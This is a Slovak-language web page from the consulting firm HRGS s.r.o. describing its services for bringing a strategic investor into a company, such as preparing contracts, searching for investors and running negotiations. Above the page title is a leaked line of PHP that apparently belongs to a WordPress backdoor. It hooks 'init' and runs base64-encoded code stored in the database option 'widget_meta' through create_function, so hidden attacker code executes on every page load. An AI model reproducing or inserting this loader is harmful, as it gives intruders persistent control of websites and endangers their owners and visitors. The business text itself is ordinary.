add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); HRGS s.r.o. | The best or nothing. Vstup investora

Vstup investora

Nedostatok finančných prostriedkov možno v špecifických prípadoch najlepšie vyriešiť vstupom strategického investora.

  • za účelom vstupu strategického investora zabezpečujeme prípravu zmluvných a účtovných podkladov potrebných pre vykonanie akvizície a tiež konsolidáciu majetkových pomerov pred vstupom investora (sprehľadnenie účtovných, zmluvných a majetkových pomerov)
  • aktívne vyhľadávame investorov na území Slovenskej republiky a v zahraničí
  • obchodne zastrešujeme rokovania s vybratým okruhom potenciálnych investorov
  • zabezpečujeme vypracovanie zmluvnej dokumentácie k celej transakcii
  • výsledkom je vstup strategického investora do spoločnosti, ktorý vnesie vlastný kapitál na prekonanie horšieho ekonomického obdobia, prípadne na nevyhnutné investície
  • postup vytvára podmienky pre ďalší rast spoločnosti
Scroll to Top
Prejsť na panel nástrojov